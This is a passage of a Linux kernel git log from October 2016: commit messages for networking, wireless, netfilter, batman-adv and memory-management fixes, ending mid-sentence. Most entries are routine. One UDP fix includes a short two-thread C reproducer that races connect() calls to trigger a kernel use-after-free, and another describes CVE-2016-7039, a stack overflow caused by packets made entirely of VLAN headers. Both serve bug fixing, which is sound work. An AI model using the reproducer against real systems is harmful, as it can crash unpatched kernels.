CC: Maxim Krasnyansky <maxk@qti.qualcomm.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:09 -04:00
Jarod Wilson
8b6b4135e4 net: use core MTU range checking in WAN drivers
- set min/max_mtu in all hdlc drivers, remove hdlc_change_mtu
- sent max_mtu in lec driver, remove lec_change_mtu
- set min/max_mtu in x25_asy driver

CC: netdev@vger.kernel.org
CC: Krzysztof Halasa <khc@pm.waw.pl>
CC: Krzysztof Halasa <khalasa@piap.pl>
CC: Jan "Yenya" Kasprzak <kas@fi.muni.cz>
CC: Francois Romieu <romieu@fr.zoreil.com>
CC: Kevin Curtis <kevin.curtis@farsite.co.uk>
CC: Zhao Qiang <qiang.zhao@nxp.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:09 -04:00
Jarod Wilson
9c22b4a34e net: use core MTU range checking in wireless drivers
- set max_mtu in wil6210 driver
- set max_mtu in atmel driver
- set min/max_mtu in cisco airo driver, remove airo_change_mtu
- set min/max_mtu in ipw2100/ipw2200 drivers, remove libipw_change_mtu
- set min/max_mtu in p80211netdev, remove wlan_change_mtu
- set min/max_mtu in net/mac80211/iface.c and remove ieee80211_change_mtu
- set min/max_mtu in wimax/i2400m and remove i2400m_change_mtu
- set min/max_mtu in intersil/hostap and remove prism2_change_mtu
- set min/max_mtu in intersil/orinoco
- set min/max_mtu in tty/n_gsm and remove gsm_change_mtu

CC: netdev@vger.kernel.org
CC: linux-wireless@vger.kernel.org
CC: Maya Erez <qca_merez@qca.qualcomm.com>
CC: Simon Kelley <simon@thekelleys.org.uk>
CC: Stanislav Yakovlev <stas.yakovlev@gmail.com>
CC: Johannes Berg <johannes@sipsolutions.net>
CC: Inaky Perez-Gonzalez <inaky.perez-gonzalez@intel.com>
Signed-off-by: Jarod Wilson <jarod@redhat.com>
Acked-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:51:08 -04:00
Eric Dumazet
a681574c99 ipv4: disable BH in set_ping_group_range()
In commit 4ee3bd4a8c ("ipv4: disable BH when changing ip local port
range") Cong added BH protection in set_local_port_range() but missed
that same fix was needed in set_ping_group_range()

Fixes: b8f1a55639 ("udp: Add function to make source port for UDP tunnels")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Eric Salo <salo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:49:32 -04:00
Eric Dumazet
286c72deab udp: must lock the socket in udp_disconnect()
Baozeng Ding reported KASAN traces showing uses after free in
udp_lib_get_port() and other related UDP functions.

A CONFIG_DEBUG_PAGEALLOC=y kernel would eventually crash.

I could write a reproducer with two threads doing :

static int sock_fd;
static void *thr1(void *arg)
{
	for (;;) {
		connect(sock_fd, (const struct sockaddr *)arg,
			sizeof(struct sockaddr_in));
	}
}

static void *thr2(void *arg)
{
	struct sockaddr_in unspec;

	for (;;) {
		memset(&unspec, 0, sizeof(unspec));
	        connect(sock_fd, (const struct sockaddr *)&unspec,
			sizeof(unspec));
        }
}

Problem is that udp_disconnect() could run without holding socket lock,
and this was causing list corruptions.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Baozeng Ding <sploving1@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:45:52 -04:00
Sabrina Dubroca
fcd91dd449 net: add recursion limit to GRO
Currently, GRO can do unlimited recursion through the gro_receive
handlers.  This was fixed for tunneling protocols by limiting tunnel GRO
to one level with encap_mark, but both VLAN and TEB still have this
problem.  Thus, the kernel is vulnerable to a stack overflow, if we
receive a packet composed entirely of VLAN headers.

This patch adds a recursion counter to the GRO layer to prevent stack
overflow.  When a gro_receive function hits the recursion limit, GRO is
aborted for this skb and it is processed normally.  This recursion
counter is put in the GRO CB, but could be turned into a percpu counter
if we run out of space in the CB.

Thanks to Vladimír Beneš <vbenes@redhat.com> for the initial bug report.

Fixes: CVE-2016-7039
Fixes: 9b174d88c2 ("net: Add Transparent Ethernet Bridging GRO support.")
Fixes: 66e5133f19 ("vlan: Add GRO support for non hardware accelerated vlan")
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reviewed-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Acked-by: Tom Herbert <tom@herbertland.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:32:22 -04:00
Jiri Bohac
7aa8e63f0d ipv6: properly prevent temp_prefered_lft sysctl race
The check for an underflow of tmp_prefered_lft is always false
because tmp_prefered_lft is unsigned. The intention of the check
was to guard against racing with an update of the
temp_prefered_lft sysctl, potentially resulting in an underflow.

As suggested by David Miller, the best way to prevent the race is
by reading the sysctl variable using READ_ONCE.

Signed-off-by: Jiri Bohac <jbohac@suse.cz>
Reported-by: Julia Lawall <julia.lawall@lip6.fr>
Fixes: 76506a986d ("IPv6: fix DESYNC_FACTOR")
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 14:29:11 -04:00
Pablo Neira Ayuso
7034b566a4 netfilter: fix nf_queue handling
nf_queue handling is broken since e3b37f11e6 ("netfilter: replace
list_head with single linked list") for two reasons:

1) If the bypass flag is set on, there are no userspace listeners and
   we still have more hook entries to iterate over, then jump to the
   next hook. Otherwise accept the packet. On nf_reinject() path, the
   okfn() needs to be invoked.

2) We should not re-enter the same hook on packet reinjection. If the
   packet is accepted, we have to skip the current hook from where the
   packet was enqueued, otherwise the packets gets enqueued over and
   over again.

This restores the previous list_for_each_entry_continue() behaviour
happening from nf_iterate() that was dealing with these two cases.
This patch introduces a new nf_queue() wrapper function so this fix
becomes simpler.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-20 19:59:59 +02:00
Nicolas Dichtel
7bb6615d39 netfilter: conntrack: restart gc immediately if GC_MAX_EVICTS is reached
When the maximum evictions number is reached, do not wait 5 seconds before
the next run.

CC: Florian Westphal <fw@strlen.de>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Acked-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-20 19:59:53 +02:00
Eric Dumazet
9652dc2eb9 tcp: relax listening_hash operations
softirq handlers use RCU protection to lookup listeners,
and write operations all happen from process context.
We do not need to block BH for dump operations.

Also SYN_RECV since request sockets are stored in the ehash table :

 1) inet_diag_dump_icsk() no longer need to clear
    cb->args[3] and cb->args[4] that were used as cursors while
    iterating the old per listener hash table.

 2) Also factorize a test : No need to scan listening_hash[]
    if r->id.idiag_dport is not zero.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:24:32 -04:00
Gavin Shan
22d8aa93d7 net/ncsi: Improve HNCDSC AEN handler
This improves AEN handler for Host Network Controller Driver Status
Change (HNCDSC):

   * The channel's lock should be hold when accessing its state.
   * Do failover when host driver isn't ready.
   * Configure channel when host driver becomes ready.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:23:08 -04:00
Gavin Shan
bbc7c01e95 net/ncsi: Choose hot channel as active one if necessary
The issue was found on BCM5718 which has two NCSI channels in one
package: C0 and C1. C0 is in link-up state while C1 is in link-down
state. C0 is chosen as active channel until unplugging and plugging
C0's cable:  On unplugging C0's cable, LSC (Link State Change) AEN
packet received on C0 to report link-down event. After that, C1 is
chosen as active channel. LSC AEN for link-up event is lost on C0
when plugging C0's cable back. We lose the network even C0 is usable.

This resolves the issue by recording the (hot) channel that was ever
chosen as active one. The hot channel is chosen to be active one
if none of available channels in link-up state. With this, C0 is still
the active one after unplugging C0's cable. LSC AEN packet received
on C0 when plugging its cable back.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:23:07 -04:00
Gavin Shan
008a424a24 net/ncsi: Fix stale link state of inactive channels on failover
The issue was found on BCM5718 which has two NCSI channels in one
package: C0 and C1. Both of them are connected to different LANs,
means they are in link-up state and C0 is chosen as the active one
until resetting BCM5718 happens as below.

Resetting BCM5718 results in LSC (Link State Change) AEN packet
received on C0, meaning LSC AEN is missed on C1. When LSC AEN packet
received on C0 to report link-down, it fails over to C1 because C1
is in link-up state as software can see. However, C1 is in link-down
state in hardware. It means the link state is out of synchronization
between hardware and software, resulting in inappropriate channel (C1)
selected as active one.

This resolves the issue by sending separate GLS (Get Link Status)
commands to all channels in the package before trying to do failover.
The last link states of all channels in the package are retrieved.
With it, C0 (not C1) is selected as active one as expected.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:23:07 -04:00
Gavin Shan
7ba5c003db net/ncsi: Avoid if statements in ncsi_suspend_channel()
There are several if/else statements in the state machine implemented
by switch/case in ncsi_suspend_channel() to avoid duplicated code. It
makes the code a bit hard to be understood.

This drops if/else statements in ncsi_suspend_channel() to improve the
code readability as Joel Stanley suggested. Also, it becomes easy to
add more states in the state machine without affecting current code.
No logical changes introduced by this.

Suggested-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:23:07 -04:00
Thomas Graf
c5098ebbd6 ila: Fix tailroom allocation of lwtstate
Tailroom is supposed to be of length sizeof(struct ila_lwt) but
sizeof(struct ila_params) is currently allocated.

This leads to the dst_cache and connected member of ila_lwt being
referenced out of bounds.

struct ila_lwt {
	struct ila_params p;
	struct dst_cache dst_cache;
	u32 connected : 1;
};

Fixes: 65d7ab8de5 ("net: Identifier Locator Addressing module")
Signed-off-by: Thomas Graf <tgraf@suug.ch>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:17:55 -04:00
Paul Blakey
5712bf9c5c net/sched: act_mirred: Use passed lastuse argument
stats_update callback is called by NIC drivers doing hardware
offloading of the mirred action. Lastuse is passed as argument
to specify when the stats was actually last updated and is not
always the current time.

Fixes: 9798e6fe4f ('net: act_mirred: allow statistic updates from offloaded actions')
Signed-off-by: Paul Blakey <paulb@mellanox.com>
Signed-off-by: Or Gerlitz <ogerlitz@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-20 11:14:24 -04:00
Jiri Benc
76e4cc7731 openvswitch: remove unnecessary EXPORT_SYMBOLs
Some symbols exported to other modules are really used only by
openvswitch.ko. Remove the exports.

Tested by loading all 4 openvswitch modules, nothing breaks.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 15:11:55 -04:00
Jiri Benc
f33eb0cf99 openvswitch: remove unused functions
ovs_vport_deferred_free is not used anywhere. It's the only caller of
free_vport_rcu thus this one can be removed, too.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 15:11:55 -04:00
Michał Narajowski
f61851f64b Bluetooth: Fix append max 11 bytes of name to scan rsp data
Append maximum of 10 + 1 bytes of name to scan response data.
Complete name is appended only if exists and is <= 10 characters.
Else append short name if exists or shorten complete name if not.
This makes sure name is consistent across multiple advertising
instances.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-10-19 18:42:37 +02:00
Florian Westphal
1ecc281ec2 netfilter: x_tables: suppress kmemcheck warning
Markus Trippelsdorf reports:

WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff88001e605480)
4055601e0088ffff000000000000000090686d81ffffffff0000000000000000
 u u u u u u u u u u u u u u u u i i i i i i i i u u u u u u u u
 ^
|RIP: 0010:[<ffffffff8166e561>]  [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160
[..]
 [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160
 [<ffffffff8166eaaf>] nf_register_net_hooks+0x3f/0xa0
 [<ffffffff816d6715>] ipt_register_table+0xe5/0x110
[..]

This warning is harmless; we copy 'uninitialized' data from the hook ops
but it will not be used.
Long term the structures keeping run-time data should be disentangled
from those only containing config-time data (such as where in the list
to insert a hook), but thats -next material.

Reported-by: Markus Trippelsdorf <markus@trippelsdorf.de>
Suggested-by: Al Viro <viro@ZenIV.linux.org.uk>
Signed-off-by: Florian Westphal <fw@strlen.de>
Acked-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-19 18:32:24 +02:00
Linus Torvalds
63ae602cea Merge branch 'gup_flag-cleanups'
Merge the gup_flags cleanups from Lorenzo Stoakes:
 "This patch series adjusts functions in the get_user_pages* family such
  that desired FOLL_* flags are passed as an argument rather than
  implied by flags.

  The purpose of this change is to make the use of FOLL_FORCE explicit
  so it is easier to grep for and clearer to callers that this flag is
  being used.  The use of FOLL_FORCE is an issue as it overrides missing
  VM_READ/VM_WRITE flags for the VMA whose pages we are reading
  from/writing to, which can result in surprising behaviour.

  The patch series came out of the discussion around commit 38e0885465
  ("mm: check VMA flags to avoid invalid PROT_NONE NUMA balancing"),
  which addressed a BUG_ON() being triggered when a page was faulted in
  with PROT_NONE set but having been overridden by FOLL_FORCE.
  do_numa_page() was run on the assumption the page _must_ be one marked
  for NUMA node migration as an actual PROT_NONE page would have been
  dealt with prior to this code path, however FOLL_FORCE introduced a
  situation where this assumption did not hold.

  See

      https://marc.info/?l=linux-mm&m=147585445805166

  for the patch proposal"

Additionally, there's a fix for an ancient bug related to FOLL_FORCE and
FOLL_WRITE by me.

[ This branch was rebased recently to add a few more acked-by's and
  reviewed-by's ]

* gup_flag-cleanups:
  mm: replace access_process_vm() write parameter with gup_flags
  mm: replace access_remote_vm() write parameter with gup_flags
  mm: replace __access_remote_vm() write parameter with gup_flags
  mm: replace get_user_pages_remote() write/force parameters with gup_flags
  mm: replace get_user_pages() write/force parameters with gup_flags
  mm: replace get_vaddr_frames() write/force parameters with gup_flags
  mm: replace get_user_pages_locked() write/force parameters with gup_flags
  mm: replace get_user_pages_unlocked() write/force parameters with gup_flags
  mm: remove write/force parameters from __get_user_pages_unlocked()
  mm: remove write/force parameters from __get_user_pages_locked()
  mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
2016-10-19 08:39:47 -07:00
Eric Dumazet
82454581d7 tcp: do not export sysctl_tcp_low_latency
Since commit b2fb4f54ec ("tcp: uninline tcp_prequeue()") we no longer
access sysctl_tcp_low_latency from a module.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 11:12:41 -04:00
Ido Schimmel
97c242902c switchdev: Execute bridge ndos only for bridge ports
We recently got the following warning after setting up a vlan device on
top of an offloaded bridge and executing 'bridge link':

WARNING: CPU: 0 PID: 18566 at drivers/net/ethernet/mellanox/mlxsw/spectrum_switchdev.c:81 mlxsw_sp_port_orig_get.part.9+0x55/0x70 [mlxsw_spectrum]
[...]
 CPU: 0 PID: 18566 Comm: bridge Not tainted 4.8.0-rc7 #1
 Hardware name: Mellanox Technologies Ltd. Mellanox switch/Mellanox switch, BIOS 4.6.5 05/21/2015
  0000000000000286 00000000e64ab94f ffff880406e6f8f0 ffffffff8135eaa3
  0000000000000000 0000000000000000 ffff880406e6f930 ffffffff8108c43b
  0000005106e6f988 ffff8803df398840 ffff880403c60108 ffff880406e6f990
 Call Trace:
  [<ffffffff8135eaa3>] dump_stack+0x63/0x90
  [<ffffffff8108c43b>] __warn+0xcb/0xf0
  [<ffffffff8108c56d>] warn_slowpath_null+0x1d/0x20
  [<ffffffffa01420d5>] mlxsw_sp_port_orig_get.part.9+0x55/0x70 [mlxsw_spectrum]
  [<ffffffffa0142195>] mlxsw_sp_port_attr_get+0xa5/0xb0 [mlxsw_spectrum]
  [<ffffffff816f151f>] switchdev_port_attr_get+0x4f/0x140
  [<ffffffff816f15d0>] switchdev_port_attr_get+0x100/0x140
  [<ffffffff816f15d0>] switchdev_port_attr_get+0x100/0x140
  [<ffffffff816f1d6b>] switchdev_port_bridge_getlink+0x5b/0xc0
  [<ffffffff816f2680>] ? switchdev_port_fdb_dump+0x90/0x90
  [<ffffffff815f5427>] rtnl_bridge_getlink+0xe7/0x190
  [<ffffffff8161a1b2>] netlink_dump+0x122/0x290
  [<ffffffff8161b0df>] __netlink_dump_start+0x15f/0x190
  [<ffffffff815f5340>] ? rtnl_bridge_dellink+0x230/0x230
  [<ffffffff815fab46>] rtnetlink_rcv_msg+0x1a6/0x220
  [<ffffffff81208118>] ? __kmalloc_node_track_caller+0x208/0x2c0
  [<ffffffff815f5340>] ? rtnl_bridge_dellink+0x230/0x230
  [<ffffffff815fa9a0>] ? rtnl_newlink+0x890/0x890
  [<ffffffff8161cf54>] netlink_rcv_skb+0xa4/0xc0
  [<ffffffff815f56f8>] rtnetlink_rcv+0x28/0x30
  [<ffffffff8161c92c>] netlink_unicast+0x18c/0x240
  [<ffffffff8161ccdb>] netlink_sendmsg+0x2fb/0x3a0
  [<ffffffff815c5a48>] sock_sendmsg+0x38/0x50
  [<ffffffff815c6031>] SYSC_sendto+0x101/0x190
  [<ffffffff815c7111>] ? __sys_recvmsg+0x51/0x90
  [<ffffffff815c6b6e>] SyS_sendto+0xe/0x10
  [<ffffffff817017f2>] entry_SYSCALL_64_fastpath+0x1a/0xa4

The problem is that the 8021q module propagates the call to
ndo_bridge_getlink() via switchdev ops, but the switch driver doesn't
recognize the netdev, as it's not offloaded.

While we can ignore calls being made to non-bridge ports inside the
driver, a better fix would be to push this check up to the switchdev
layer.

Note that these ndos can be called for non-bridged netdev, but this only
happens in certain PF drivers which don't call the corresponding
switchdev functions anyway.

Fixes: 99f44bb352 ("mlxsw: spectrum: Enable L3 interfaces on top of bridge devices")
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Reported-by: Tamir Winetroub <tamirw@mellanox.com>
Tested-by: Tamir Winetroub <tamirw@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 10:58:04 -04:00
Ido Schimmel
e4961b0768 net: core: Correctly iterate over lower adjacency list
Tamir reported the following trace when processing ARP requests received
via a vlan device on top of a VLAN-aware bridge:

 NMI watchdog: BUG: soft lockup - CPU#1 stuck for 22s! [swapper/1:0]
[...]
 CPU: 1 PID: 0 Comm: swapper/1 Tainted: G        W       4.8.0-rc7 #1
 Hardware name: Mellanox Technologies Ltd. "MSN2100-CB2F"/"SA001017", BIOS 5.6.5 06/07/2016
 task: ffff88017edfea40 task.stack: ffff88017ee10000
 RIP: 0010:[<ffffffff815dcc73>]  [<ffffffff815dcc73>] netdev_all_lower_get_next_rcu+0x33/0x60
[...]
 Call Trace:
  <IRQ>
  [<ffffffffa015de0a>] mlxsw_sp_port_lower_dev_hold+0x5a/0xa0 [mlxsw_spectrum]
  [<ffffffffa016f1b0>] mlxsw_sp_router_netevent_event+0x80/0x150 [mlxsw_spectrum]
  [<ffffffff810ad07a>] notifier_call_chain+0x4a/0x70
  [<ffffffff810ad13a>] atomic_notifier_call_chain+0x1a/0x20
  [<ffffffff815ee77b>] call_netevent_notifiers+0x1b/0x20
  [<ffffffff815f2eb6>] neigh_update+0x306/0x740
  [<ffffffff815f38ce>] neigh_event_ns+0x4e/0xb0
  [<ffffffff8165ea3f>] arp_process+0x66f/0x700
  [<ffffffff8170214c>] ? common_interrupt+0x8c/0x8c
  [<ffffffff8165ec29>] arp_rcv+0x139/0x1d0
  [<ffffffff816e505a>] ? vlan_do_receive+0xda/0x320
  [<ffffffff815e3794>] __netif_receive_skb_core+0x524/0xab0
  [<ffffffff815e6830>] ? dev_queue_xmit+0x10/0x20
  [<ffffffffa06d612d>] ? br_forward_finish+0x3d/0xc0 [bridge]
  [<ffffffffa06e5796>] ? br_handle_vlan+0xf6/0x1b0 [bridge]
  [<ffffffff815e3d38>] __netif_receive_skb+0x18/0x60
  [<ffffffff815e3dc0>] netif_receive_skb_internal+0x40/0xb0
  [<ffffffff815e3e4c>] netif_receive_skb+0x1c/0x70
  [<ffffffffa06d7856>] br_pass_frame_up+0xc6/0x160 [bridge]
  [<ffffffffa06d63d7>] ? deliver_clone+0x37/0x50 [bridge]
  [<ffffffffa06d656c>] ? br_flood+0xcc/0x160 [bridge]
  [<ffffffffa06d7b14>] br_handle_frame_finish+0x224/0x4f0 [bridge]
  [<ffffffffa06d7f94>] br_handle_frame+0x174/0x300 [bridge]
  [<ffffffff815e3599>] __netif_receive_skb_core+0x329/0xab0
  [<ffffffff81374815>] ? find_next_bit+0x15/0x20
  [<ffffffff8135e802>] ? cpumask_next_and+0x32/0x50
  [<ffffffff810c9968>] ? load_balance+0x178/0x9b0
  [<ffffffff815e3d38>] __netif_receive_skb+0x18/0x60
  [<ffffffff815e3dc0>] netif_receive_skb_internal+0x40/0xb0
  [<ffffffff815e3e4c>] netif_receive_skb+0x1c/0x70
  [<ffffffffa01544a1>] mlxsw_sp_rx_listener_func+0x61/0xb0 [mlxsw_spectrum]
  [<ffffffffa005c9f7>] mlxsw_core_skb_receive+0x187/0x200 [mlxsw_core]
  [<ffffffffa007332a>] mlxsw_pci_cq_tasklet+0x63a/0x9b0 [mlxsw_pci]
  [<ffffffff81091986>] tasklet_action+0xf6/0x110
  [<ffffffff81704556>] __do_softirq+0xf6/0x280
  [<ffffffff8109213f>] irq_exit+0xdf/0xf0
  [<ffffffff817042b4>] do_IRQ+0x54/0xd0
  [<ffffffff8170214c>] common_interrupt+0x8c/0x8c

The problem is that netdev_all_lower_get_next_rcu() never advances the
iterator, thereby causing the loop over the lower adjacency list to run
forever.

Fix this by advancing the iterator and avoid the infinite loop.

Fixes: 7ce856aaaf ("mlxsw: spectrum: Add couple of lower device helper functions")
Signed-off-by: Ido Schimmel <idosch@mellanox.com>
Reported-by: Tamir Winetroub <tamirw@mellanox.com>
Reviewed-by: Jiri Pirko <jiri@mellanox.com>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 10:38:08 -04:00
Eric Garver
3805a938a6 flow_dissector: Check skb for VLAN only if skb specified.
Fixes a panic when calling eth_get_headlen(). Noticed on i40e driver.

Fixes: d5709f7ab7 ("flow_dissector: For stripped vlan, get vlan info from skb->vlan_tci")
Signed-off-by: Eric Garver <e@erig.me>
Reviewed-by: Jakub Sitnicki <jkbs@redhat.com>
Acked-by: Amir Vadai <amir@vadai.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-19 10:35:46 -04:00
Andrei Otcheretianski
0ea2a2ee8d cfg80211: allow vendor commands to be sent to nan interface
Allow vendor commands that require WIPHY_VENDOR_CMD_NEED_RUNNING flag
to be sent to NAN interface.

Signed-off-by: Andrei Otcheretianski <andrei.otcheretianski@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:16:02 +02:00
Ilan Peer
0711d63878 cfg80211: allow aborting in-progress connection atttempts
On a disconnect request from userspace, cfg80211 currently calls
called rdev_disconnect() only in case that 'current_bss' was set,
i.e. connection had been established.

Change this to allow the userspace call to succeed and call the
driver's disconnect() method also while the connection attempt is
in progress, to be able to abort attempts.

Signed-off-by: Ilan Peer <ilan.peer@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
[change commit subject/message]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:15:38 +02:00
Emmanuel Grumbach
f438ceb81d mac80211: uapsd_queues is in QoS IE order
The uapsd_queue field is in QoS IE order and not in
IEEE80211_AC_*'s order.
This means that mac80211 would get confused between
BK and BE which is certainly not such a big deal but
needs to be fixed.

Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:13:54 +02:00
Sara Sharon
f3fe4e93dd mac80211: add a HW flag for supporting HW TX fragmentation
Currently mac80211 determines whether HW does fragmentation
by checking whether the set_frag_threshold callback is set
or not.
However, some drivers may want to set the HW fragmentation
capability depending on HW generation.
Allow this by checking a HW flag instead of checking the
callback.

Signed-off-by: Sara Sharon <sara.sharon@intel.com>
[added the flag to ath10k and wlcore]
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:12:44 +02:00
Emmanuel Grumbach
0aa419ec6e mac80211: allow the driver not to pass the tid to ieee80211_sta_uapsd_trigger
iwlwifi will check internally that the tid maps to an AC
that is trigger enabled, but can't know what tid exactly.
Allow the driver to pass a generic tid and make mac80211
assume that a trigger frame was received.

Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:12:19 +02:00
Johannes Berg
b473b8f12a mac80211: improve RX aggregation data in debugfs
When the driver sets the SUPPORTS_REORDERING_BUFFER hardware flag,
the debugfs data for RX aggregation sessions won't even indicate
that a session is open. Since the previous fix to store the dialog
token separately, we can indicate that it's open and add the token
so that there's at least some data (ssn is not available.)

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:12:11 +02:00
Johannes Berg
1c3d185a9a mac80211: fix tid_agg_rx NULL dereference
On drivers setting the SUPPORTS_REORDERING_BUFFER hardware flag,
we crash when the peer sends an AddBA request while we already
have a session open on the seame TID; this is because on those
drivers, the tid_agg_rx is left NULL even though the session is
valid, and the agg_session_valid bit is set.

To fix this, store the dialog tokens outside the tid_agg_rx to
be able to compare them to the received AddBA request.

Fixes: f89e07d4cf ("mac80211: agg-rx: refuse ADDBA Request with timeout update")
Reported-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-19 12:11:49 +02:00
Sven Eckelmann
4c7da0f6db batman-adv: Avoid precedence issues in macros
It must be avoided that arguments to a macro are evaluated ungrouped (which
enforces normal operator precendence). Otherwise the result of the macro
is not well defined.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:54 +02:00
Sven Eckelmann
507b37cf71 batman-adv: Use octal permissions instead of macros
Linus prefers to have octal permission numbers instead of combinations of
macro names ("random line noise"). Also old existing "bad symbolic
permission bit macro use" should be converted to octal numbers.
(http://lkml.kernel.org/r/CA+55aFw5v23T-zvDZp-MmD_EYxF8WbafwwB59934FV7g21uMGQ@mail.gmail.com)

Also remove the S_IFREG bit from the octal representation because it is
filtered out by debugfs_create.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:53 +02:00
Sven Eckelmann
70ea5cee95 batman-adv: Use proper name for gateway list head
The batman-adv codebase is using "list" for the list node (prev/next) and
<list content descriptor>+"_list" for the head of a list. Not using this
naming scheme can up in confusions when reading the code.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:53 +02:00
Sven Eckelmann
176e5b772b batman-adv: Use proper name for fragments list head
The batman-adv codebase is using "list" for the list node (prev/next) and
<list content descriptor>+"_list" for the head of a list. Not using this
naming scheme can up in confusions because list_head is used for both the
head of the list and the list node (prev/next) in each item of the list.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:52 +02:00
Sven Eckelmann
422d2f7780 batman-adv: Remove needless init of variables on stack
Some variables are overwritten immediatelly in a functions. These don't
have to be initialized to a specific value on the stack because the value
will be overwritten before they will be used anywhere.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-10-19 08:37:52 +02:00
Lorenzo Stoakes
c164154f66 mm: replace get_user_pages_unlocked() write/force parameters with gup_flags
This removes the 'write' and 'force' use from get_user_pages_unlocked()
and replaces them with 'gup_flags' to make the use of FOLL_FORCE
explicit in callers as use of this flag can result in surprising
behaviour (and hence bugs) within the mm subsystem.

Signed-off-by: Lorenzo Stoakes <lstoakes@gmail.com>
Reviewed-by: Jan Kara <jack@suse.cz>
Acked-by: Michal Hocko <mhocko@suse.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-18 14:13:37 -07:00
Gao Feng
9c403b6bee net: vlan: Use sizeof instead of literal number
Use sizeof variable instead of literal number to enhance the readability.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 14:23:23 -04:00
Eric Dumazet
41ee9c557e soreuseport: do not export reuseport_add_sock()
reuseport_add_sock() is not used from a module,
no need to export it.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-18 14:18:23 -04:00
Nikolay Aleksandrov
7cb3f9214d bridge: multicast: restore perm router ports on multicast enable
Satish reported a problem with the perm multicast router ports not getting
reenabled after some series of events, in particular if it happens that the
